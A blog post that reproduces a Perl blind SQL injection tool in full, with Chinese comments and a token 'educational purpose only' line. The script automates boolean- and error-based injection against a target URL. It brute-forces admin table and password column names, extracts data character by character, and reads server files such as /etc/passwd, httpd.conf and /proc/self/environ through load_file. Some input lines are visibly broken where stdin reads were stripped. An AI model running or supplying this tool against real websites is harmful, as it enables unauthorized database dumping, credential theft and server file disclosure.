Jun 5, 2012

Perl script for SQL Injection By c4rp3nt3r@0x50sec.org

    #!/usr/bin/perl
    # blind sqlinjector [GET Method]
    # for educational purpose only!
    # by c4rp3nt3r@0x50sec.org
    
    use POSIX;
    use LWP::UserAgent;
    
    ######################### 配置信息 开始 #################################
    
    $target ="http://www.0x50sec.org/index.php?p=1'";               # 注射url 字符型注射要在后面加' 并设置闭合注释#!!!
    $turestr='c4rp3nt3r.jpg';       #!!! 正确页面字符 需要修改                            
    
    ###################### 上面两个必须设置 ###########################
    
    $nullstr="%09";         # %20 + /**/ %09 %0a %0d
    $comstr="";                     # 闭合字符串 # -- /* ; $nullstr."aNd".$nullstr."'1'='1";
    
    $tb_prefix='';          # 设置表名前缀
    
    #fuzz path 配置选项
    #
    $somexfile='index.php';
    $domain='0x50sec.org';
    $homeusr='c4rp3nt3r';
    
    ########################## 配置信息 结束 #################################      
    
    @tables=(
    'admin',
    'information_schema.tables',
    'zipcode',
    'joyboard_admin',
    'tbl_manager',
    'SuperUser',
    'admins',
    'n_news',
    'enterprise_file_room',
    'BOARD_TB',
    'ADMIN_TB',
    'campuslogin',
    'users',
    'user',
    'usr_pw',
    'salt',
    'members',
    'rg_member',
    'mysql.user',
    'hash',
    'login',
    'log_user',
    'admin_user',
    'adminuser',
    'admin_info',
    'member_admin',
    'AdminUsers',
    'administrables',
    'administrateur',
    'administrateurs',
    'login_admin',
    'login_admins',
    'login_user',
    'login_users',
    'lost_pass',
    'lost_passwords',
    'lostpass',
    'lostpasswords',
    'stnuser',
    'stuser',
    'stusers',
    'stuseres',
    'staff',
    'u_name',
    'u_p',
    'u_pass',
    'Benutzer',
    'usercontrol',
    'user_pw',
    'Benutzerliste',
    'userlogins',
    'userpasswd',
    'admuser',
    'system',
    'adm',
    'tb_user',
    'x_admin',
    'm_admin',
    'manage',
    'member',
    'tbl_user',
    'tbl_data',
    'tbl_users',
    'tbl_admin',
    'tbl_admins',
    'tbl_member',
    'tbl_members',
    'tbladmins',
    'tb_club_admin',
    'tb_club_member',
    'tb_club_board_admin',
    'admin_user',
    'admin_userinfo',
    'administrator',
    'adminid',
    'admin_id',
    'adminuserid',
    'admin_userid',
    'AdminUID',
    'adminusername',
    'admin_username',
    'adminname',
    'admin_name',
    'wp_users',
    );
    
    #$sql='select table_name from information_schema.tables where TABLE_SCHEMA=0x6368656d limit 0,1';
    #$final="shit%\' and OrDMiD(($sql),1,1))>";
    #$final = $final.$num." #";
    
    $x_fuzzsql='';
    
    $subset=1;
    $subset=$ARGV[1];
    $num=50;
    $result="";
    $result_num="";
    $oknum=0;
    
    $long=0;
    $oktbnum='1';
    @oktb=();
    $long=@oktb;
    
    @ok_tbname=();
    $long=@ok_tbname;
    
    @ok_usr_clm=();
    $long=@ok_usr_clm;
    @ok_pwd_clm=();
    $long=@ok_pwd_clm;
    
    @ok_path=();
    $long=@ok_path;
    
    @ok_clmname=();
    $long=@ok_clmname;
    
    #---------------------------------------------------------
    print "\n";
    print "\t|=-----------------------------------------=|\n";
    print "\t|=------[ Blind SQL Injector V1.3 ]--------=|\n";
    print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
    print "\t|=-----------------------------------------=|\n\n";
    
    dump_fuzz_half_alpha();
    
    #fuzz_tb();
    #fuzz_pwd_usr_clm();
    
    print "-------------------------------\n\n";
    
    print "[+]$x_fuzzsql:\n";
    #print("@oktb\n");
    foreach $oktbnum(@oktb)
    {
            printf("%c",$oktbnum);
    }
    print "\n";
    
    #print "[+]$sql:\n$result_num\n";
    #print("@oktb\n");
    #-------------------------------------------------------------
    
    foreach $x_ok_tbname(@ok_tbname)
    {
            print " ".$x_ok_tbname."\n";
    }
    foreach $x_ok_clm(@ok_clmname)
    {
            print " ".$x_ok_clm."\n";
    }
    foreach $x_ok_path(@ok_path)
    {
            print " ".$x_ok_path."\n";
    }
    print "\n";
    print "[+] Enjoy Hacking...\n\n\007";
    print "-------------------------------\n\n";
    
    #################################
    
    sub dump_fuzz_half_alpha
    {
    
    print 'Choose a number to be execute:
            [0] sql (from [STDIN])
            [1] version()
            [2] database()
            [3] user()
            [4] dump table_schema v5.x
            [5] dump table_name (table_schem=database() v5.x)
            [6] dump column_name (table_name= [STDIN] v5.x)
            [7] fuzz table_name v4.x
            [8] fuzz column_name v4.x
            [9] fuzz web path(\'read httpd.conf\')
            [a] load_file(\'/etc/passwd\')
            [b] load_file(\'c:\\boot.ini\')
            [c] load_file(\'file path from [STDIN]\')
            [d] load_file(\'file path from [STDIN] error base\')
            [e] dump table_schema (v5.x error base)
            [f] dump table_name (table_schem=database() v5.x error base)
            [g] dump column_name (table_name= [STDIN] v5.x error base)
            [h] fuzz table_name (v4.x error base)
            [i] fuzz column_name (v4.x error base)
            [x] sql (from [STDIN] error base)
            ';
            print "\n";
            print "Choose a number#";
            $xnum= ; chomp $xnum;
            if($xnum eq '0')
            {
                    print "Enter the sql#";
                    $sql_stdin= ; chomp $sql_stdin;
                    dump_fuzz_half($sql_stdin);
            }elsif($xnum eq '1')
            {
                    $sql_x='version()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '2')
            {
                    $sql_x='database()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '3')
            {
                    $sql_x='user()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '4')
            {
                    $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '5')
            {
                    $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '6')
            {
                    print "Enter The table_name#";
                    $sql_stdin= ; chomp $sql_stdin;
                    $sql_stdin="0x".hexencode($sql_stdin);
                    $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq '7')
            {
                    fuzz_tb();
            }elsif($xnum eq '8')
            {
                    print "Enter The table name to fuzz the column#";
                    $sql_stdin= ; chomp $sql_stdin;
                    fuzz_pwd_usr_clm($sql_stdin);
            }elsif($xnum eq '9')
            {
                    fuzz_webpath();
            }
            elsif($xnum eq 'a')
            {
                    $file_path="load_file(0x".hexencode('/etc/passwd').")";
                    dump_fuzz_half($file_path);
            }elsif($xnum eq 'b')
            {
                    $file_path="load_file(0x".hexencode('c:\\boot.ini').")";
                    $sql_x="load_file($file_path)";
                    dump_fuzz_half($sql_x);
    
            }
            elsif($xnum eq 'c')
            {
                    print "Enter The file path to load_file#";
                    $sql_stdin= ; chomp $sql_stdin;
                    $file_path="0x".hexencode($sql_stdin);
                    $sql_x="load_file($file_path)";
                    dump_fuzz_half($sql_x);
            }elsif($xnum eq 'd')
            {
                    print "Enter The file path to load_file#";
                    $sql_stdin= ; chomp $sql_stdin;
                    #$sql_stdin='/usr/local/apache2/htdocs/admin/admin.php';
                    $file_path="0x".hexencode($sql_stdin);
                    $sql_x="load_file($file_path)";
                    err_exp($sql_x);
            }elsif($xnum eq 'e')
            {
                    $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
                    err_exp($sql_x);
    
            }elsif($xnum eq 'f')
            {
    
                    $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
                    err_exp($sql_x);
            }elsif($xnum eq 'g')
            {
                    print "Enter The table_name#";
                    $sql_stdin= ; chomp $sql_stdin;
                    $sql_stdin="0x".hexencode($sql_stdin);
                    $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
                    err_exp($sql_x);
            }elsif($xnum eq 'h')
            {
                    fuzz_tb_err_exp();
            }elsif($xnum eq 'i')
            {
                    print "Enter The table name to fuzz the column#";
                    $sql_stdin= ; chomp $sql_stdin;
                    fuzz_pwd_usr_clm_err($sql_stdin);
            }elsif($xnum eq 'x')
            {
                    print "Enter the sql#";
                    $sql_stdin= ; chomp $sql_stdin;
                    err_exp($sql_stdin);
            }
    
    }
    #################
    sub hexencode{ #Sub to hex encode
    @subvar= @_;
    my $sqlstr = $subvar[0];
    my $encoded_command="";
    my @ASCII = unpack("C*", $sqlstr);
    foreach $line (@ASCII) {
    
    my $encoded = sprintf('%lx',$line);
    $encoded_command .= $encoded;
    }
    return $encoded_command;
    }
    
    #################
    sub fuzz_webpath
    {
    
    @ok_path=();
    $long=@ok_path;
    
    print "[*] Fuzzing path ...\n\n";
    @paths=(
    '/usr/local/apache/conf/httpd.conf',
    '/usr/local/apache2/conf/httpd.conf',
    '/usr/local/apache2/conf/extra/httpd-ssl.conf', #apache2.2
    '/usr/local/etc/apache/httpd.conf',
    '/etc/apache2/apache2.conf',                            #ubuntu 2.0
    '/etc/httpd/conf/httpd.conf',
    '/var/log/apache2/error_log',
    '/var/log/apache/access_log',
    '/var/apache2/logs/error_log',
    '/var/log/httpd/error_log',
    '/etc/passwd',
    '/etc/issue',
    '/proc/version',
    '/proc/self/environ',
    );
    
    @wwwpaths=(
    '/var/www/',
    '/data/html/',
    '/www/htdocs/',
    '/home/webadm/',
    '/home/webadm/public_html/',
    '/usr/local/webroot/',
    '/var/apache2/htdocs/',
    '/var/www/htdocs/',
    '/var/www/html/',
    '/opt/lampp/htdocs/',
    '/var/www/localhost/htdocs/',
    '/usr/local/apache/htdocs/',
    '/usr/local/apache2/htdocs/',
    '/usr/local/www/apache22/data/',
    '/usr/local/www/data/',
    '/export/home/webhost/apache/apache1/htdocs/',
    '/web/',
    '/data/',
    '/www/',
    "/home/$homeusr/html/",
    "/home/$homeusr/docs/",
    "/home/$homeusr/public_html/",
    "/home/$homeusr/www/",
    "/home/$domain/www/",
    "/home/$domain/public_html/",
    "/www/htdocs/$domain/",
    "/home/$homeusr/$domain/",
    "/usr/local/webroot/$domain/",
    "/home/$homeusr/",
    "/www/users/$domain/",
    "/home/hosting_users/$homeusr/",
    "/data/webroot/$domain/",
    "/export/$homeusr/public_html/",
    "/home/www/websites/",
    "/home/www/websites/$homeusr/",
    "/var/www/html/$homeusr",
    );
    
            foreach $path(@paths)
            {
                    my $xfile="0x".hexencode($path);
                    $final=$target.$nullstr.'aND'.$nullstr.'length(load_file('.$xfile.'))>0'.$comstr;
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua->get($final);
                    print $final."\n";
                    print "[*] Fuzzing web path  [$path]"."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                    $result=$result."[+] Found ->".$path."\n\n";
                    print " \n[+] Found web path-> [$path]"."\n\n";
                    $long=@ok_path;
                    @ok_path[$long]=$path;  #将存在的表名放到一个数组里
                    }
            }
            foreach $wpath(@wwwpaths)
            {
                    $some='index.php';
                    $wpath=$wpath.$some;
                    my $xxfile="0x".hexencode($wpath);
                    $final=$target.$nullstr.'aND'.$nullstr.'LEnGth(lOad_FiLe('.$xxfile.'))>0'.$comstr;
                    $ua2 =  new LWP::UserAgent or die;
                    $ua2->timeout(35);
                    $ua2->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua2->get($final);
                    print "[*] Fuzzing web path [$wpath]"."\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found ->".$wpath."\n\n";
                            print " \n[+] Found web path-> [$wpath]"."\n\n";
                            $long=@ok_path;
                            @ok_path[$long]=$wpath; #将存在的表名放到一个数组里
                    }
            }
    }
    
    sub fuzz_tb_err_exp
    {
    $xsql = 'SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
    
    #if($version==4)就是一个爆破表名的工具
    #print "$sql\n\007\n";
    @ok_tbname=();
    $long=@ok_tbname;
    
    print "[*]Fuzz table name...\n\n";
    
            foreach $tbname(@tables)
            {
    
                    print "[*]Fuzz table name [$tbname]"."\n";
                    $sqlexp = $xsql.$nullstr.$tb_prefix.$tbname;
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
                    $payload = "aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
    
                                    print " \n[+] Found table_name-> [$tbname]"."\n\n";
                                    $long=@ok_tbname;
                                    @ok_tbname[$long]=$tbname;      #将存在的表名放到一个数组里
                            $result = $content;
                            print "[+] content : \n$result\n\n";
                            }
                    }else
                    {
                            print "[-]$tbname doesn't exist!\n";
                            next;
                    }
    
            }
    
    }
    
    sub fuzz_tb
    {
    $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--
    
    #if($version==4)就是一个爆破表名的工具
    #print "$sql\n\007\n";
    @ok_tbname=();
    $long=@ok_tbname;
    
    print "[*]Fuzz table name...\n\n";
    
            foreach $tbname(@tables)
            {
                    $final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
                    $ua =  new LWP::UserAgent or die;
                    $ua->timeout(35);
                    $ua->proxy("http", "http://$proxy/") if defined($proxy);
                    $tbres = $ua->get($final);
                    print "[*]Fuzz table name [$tbname]"."\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found ->".$tbname."\n\n";
                            print " \n[+] Found table_name-> [$tbname]"."\n\n";
                            $long=@ok_tbname;
                            @ok_tbname[$long]=$tbname;      #将存在的表名放到一个数组里
                    }
            }
    
    }
    ###################
    sub fuzz_pwd_usr_clm_err
    {
    my($xok_tbname)=@_;
    ##-------
    
    @usrclms=(
    'id',
    'idx',
    'admin',
    'adminname',
    'admin_id',
    'user_name',
    'user',
    'username',
    'login',
    'email',
    'user_id',
    'no',
    'uid',
    'cnumber',
    'zipcode',
    'job',
    'mail',
    'usr',
    'name',
    'u_name',
    'login_id',
    'administrators',
    'administrator',
    'adminuser',
    'adminname',
    'admin_name',
    'admin_user',
    'admin_username',
    'user_admin',
    'user_n',
    'AD_id',
    'user_un',
    'user_uname',
    'user_username',
    'user_usernm',
    'user_usernun',
    'user_usrnm',
    'usr',
    'usr_n',
    'usr_name',
    'usr_pass',
    'usr2',
    'usrn',
    'userid',
    'usrnam',
    'usrname',
    'usrnm',
    'adminusername',
    'bbsuser',
    'bbsid',
    'bbsusername',
    'permission',
    'access',
    'accnt',
    'accnts',
    'account',
    'accounts',
    '帐号',
    '管理员',
    '权限',
    '用户名',
    '会员',
    '用户帐号',
    );
    @pwdclms=(
    'password',
    'userpass',
    'pass',
    'pwd',
    'psw',
    'userpwd',
    'userpw',
    'psd',
    'pw',
    'user_pass',
    'admin_password',
    'PassWD',
    'user_password',
    'uPassword',
    'user_pwd',
    'adminpwd',
    'admin_pass',
    'admin_pwd',
    'admin_password',
    'login_pass',
    'login_passwd',
    'login_password',
    'login_pw',
    'AD_pass',
    'login_pwd',
    'login_user',
    'login_username',
    'adminpsw',
    'adminupass',
    'user_pass',
    'user_passw',
    'user_passwd',
    'user_pw',
    'user_pwd',
    'user_pword',
    'pword',
    'user_pwrd',
    '密码',
    '用户密码',
    '编号',
    );
    
            $ua =  new LWP::UserAgent or die;
            $ua->timeout(35);
            $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
            print "\n[*]Fuzz user column name...\n\n";
            foreach $usr_clm(@usrclms)
            {
    
                    $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
                    $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
                                    $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
                                    print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                                    $usr=$usr_clm;
                                    $long=@ok_clmname;
                                    $ok_clmname[$long]=$usr_clm;
                            $result = $content;
                            print "[+] content : \n$usr_clm\n\n";
                            }
                    }else
                    {
                            print "[-]$usr_clm doesn't exist!\n";
                            next;
                    }
    
            }
    
            print "\n[*]Fuzz password column name...\n\n";
            foreach $pwd_clm(@pwdclms)
            {
                    $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
                    $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$payload.$comstr;
                    print $final."\n";
                    $res=$ua->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
                    {
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//;
                        $content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                            print "[+] got data finished!\n";
                            next;
                        }else
                            {
                                    $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
                                    print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                                    $pwd=$pwd_clm;
                                    $long=@ok_clmname;
                                    $ok_clmname[$long]=$pwd_clm;
                            $result = $content;
                            print "[+] content : \n$pwd_clm\n\n";
                            }
                    }else
                    {
                            print "[-]$pwd_clm doesn't exist!\n";
                            next;
                    }
            }
            $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            print "[+]".$fuzzsql."\n";
            #dump_fuzz_half($fuzzsql);
    
    }
    ##################################
    sub fuzz_pwd_usr_clm
    {
    my($xok_tbname)=@_;
    ##-------
    
    @usrclms=(
    'id',
    'idx',
    'admin',
    'adminname',
    'admin_id',
    'user_name',
    'user',
    'username',
    'login',
    'email',
    'mail',
    'AD_id',
    'usr',
    'name',
    'u_name',
    'login_id',
    'administrators',
    'administrator',
    'adminuser',
    'adminname',
    'admin_name',
    'admin_user',
    'admin_username',
    'user_admin',
    'user_n',
    'user_un',
    'user_uname',
    'user_username',
    'user_usernm',
    'user_usernun',
    'user_usrnm',
    'usr',
    'usr_n',
    'usr_name',
    'usr_pass',
    'usr2',
    'usrn',
    'userid',
    'usrnam',
    'usrname',
    'usrnm',
    'adminusername',
    'bbsuser',
    'bbsid',
    'bbsusername',
    'permission',
    'access',
    'accnt',
    'accnts',
    'account',
    'accounts',
    '帐号',
    '管理员',
    '权限',
    '用户名',
    '会员',
    '用户帐号',
    );
    @pwdclms=(
    'password',
    'userpass',
    'pass',
    'pwd',
    'psw',
    'userpwd',
    'userpw',
    'psd',
    'pw',
    'user_pass',
    'admin_password',
    'PassWD',
    'user_password',
    'uPassword',
    'user_pwd',
    'adminpwd',
    'admin_pass',
    'admin_password',
    'login_pass',
    'login_passwd',
    'login_password',
    'login_pw',
    'login_pwd',
    'login_user',
    'login_username',
    'adminpsw',
    'AD_pass',
    'admin_pwd',
    'adminupass',
    'user_pass',
    'user_passw',
    'user_passwd',
    'user_pw',
    'user_pwd',
    'user_pword',
    'pword',
    'user_pwrd',
    '密码',
    '用户密码',
    '编号',
    );
    
            $ua =  new LWP::UserAgent or die;
            $ua->timeout(35);
            $ua->proxy("http", "http://$proxy/") if defined($proxy);
    
            print "\n[*]Fuzz user column name...\n\n";
            foreach $usr_clm(@usrclms)
            {
                    $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
                    $final=$target.$xsql;
                    $tbres = $ua->get($final);
                    print "[*]Fuzz $usr_clm from $xok_tbname ...\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
                            print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                            $usr=$usr_clm;
                            $long=@ok_clmname;
                            $ok_clmname[$long]=$usr_clm;
                            #last;
                    }
            }
    
            print "\n[*]Fuzz password column name...\n\n";
            foreach $pwd_clm(@pwdclms)
            {
                    $xsql = $nullstr."union".$nullstr."select".$nullstr;
            $xsql =
            $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
    
                    $final=$target.$xsql;
                    $tbres = $ua->get($final);
                    print "[*]Fuzz [$pwd_clm] from [$xok_tbname] ...\n";
                    print $final."\n";
                    if($tbres->content =~ /$turestr/)
                    {
                            $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
                            print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                            $pwd=$pwd_clm;
                            $long=@ok_clmname;
                            $ok_clmname[$long]=$pwd_clm;
                            #last;
                    }
            }
            $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            print "[+]".$fuzzsql."\n";
            #dump_fuzz_half($fuzzsql);
    
    }
    
    #################################
    sub dump_fuzz_half
    {
            my($fuzzsql) = @_;
            #$fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
            $fucked='';
            for($subset=1;$subset<800;$subset++)
            {
                    $oknum=fuzz_half($fuzzsql,$subset,0,127);
                    if($oknum==0)
                    {
                            $long=@oktb;
                            @oktb[$long]=10;
                            last;
                    }
                    $result.=$subset.":".$oknum."\n";
                    $result_num.=$oknum." ";
                    $long=@oktb;
                    @oktb[$long]=$oknum;
                    #print "$result";
                    #print "$result_num\n";
                    print "[+]$fuzzsql:\n";
    
                    foreach $xoktbnum(@oktb)
                    {
                            printf("%c",$xoktbnum);
                    }
                    print "\n\n";
            }
            print "\n\n\n";
    
    }
    
    ##################################
    sub fuzz_half   #order by语句递归查询函数采用折半法
    {
       #($min,$max)区间代表一个范围,正确的字段数在其中我们折半缩小之直到找到正确字段数
       #$min 代表能够正常显示的已经确定的最小整数
       #$max 代表不能够正常显示的已经确定的最小整数,作为我们可以确定的范围的最大数所以叫其"max"
       my ($sql,$subset,$min, $max) = @_;
       $x_fuzzsql=$sql;
       if($max==1&&$min==0)
       {
                    return 0;
       }
       if($max-$min==1)#如果能正常显示的最小整数比不能正常显示的最小整数大一那么最小的数$min
        {                           #就是要找的正确字段数目退出递归函数返回之
            return $max;
       }
       #如果上面条件没成立就取范围中间的数字作为order by查询字段数
       my $mid=int(($min+$max)/2);#取两个正整数的平均值
       #print "max:$max,min:$min,mid=$mid\n";
            $final=$nullstr."AnD".$nullstr."ascii(mid(($sql)%2C".$nullstr."$subset%2C".$nullstr."1))>";
            $final = $target.$final.$mid.$comstr;
    
            print "[*] Test ascii(MiD(($sql)%2C$subset%2C1))>$mid...\n";
            print $final."\n";
       #print $final."\n";
            my $lwp = new LWP::UserAgent or die;
            $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
    
       my $res = $lwp->get($final);
            my $myres=$res->content; #for test
       #printf($myres) ;    #for test
       #if($myres=~/http:\/\/login.renren.com\/callback.do/)
            #To judge if the login is sucess
            if($res->content =~ /$turestr/)
       {
                    $min=$mid;
                    fuzz_half($sql,$subset,$min,$max);
       }
            else
            {
                    $max=$mid;
                    fuzz_half($sql,$subset,$min,$max);
            }
    }
    
    sub err_exp
    {
            my($loadx) = @_;
    
            $ua2 = new LWP::UserAgent or die;
            $ua2->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
            $ua2->timeout(35);
            $ua2->proxy("http", "http://$proxy/") if defined($proxy);
            $result='';
            for($i=1;$i<8000;$i=$i+62)
            {
                    #当对此库from+information_schema无权限的时候要换成其他已知库
                    #$xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group by a)b)";
                    $xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group+by+a)b)";
                    $final=$target.'+'.$xsql.$comstr;
                    print $final."\n";
                    $res=$ua2->get($final);
                    #print $res->content;
                    if ($res->content =~/Duplicate entry \'1\' for key /)
                    {
                            print "[+] got data finished!\n";
                            last;
                    }
                    if ($res->content =~ /Duplicate entry \'1([\s\S]*)\' for key /s)
                    {
                        $content = $&;
                        $content =~ s/Duplicate entry \'1//g;
                        #$content =~ s/\' for key //;
                        if(length($content)<1)
                        {
                                    print "[+] got data finished!\n";
                                    last;
    
                        }
                        $position = index($content,"\' for key ");
                        $content = substr($content,0,$position);
    
                        $result .= $content;
                        print "[+] content : \n$result\n\n";
                    }else
                    {
                            print "[-]can not got data!\n";
                            last;
                    }
            }
            print "[+] result : \n$result\n\n";
            open(FH,">>result.txt");
            print FH ("$result\n\n");
            close(FH);
    }

 


Source: http://pastebin.com/RHqfLers

If you like my blog, Please Donate Me

No comments:

 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |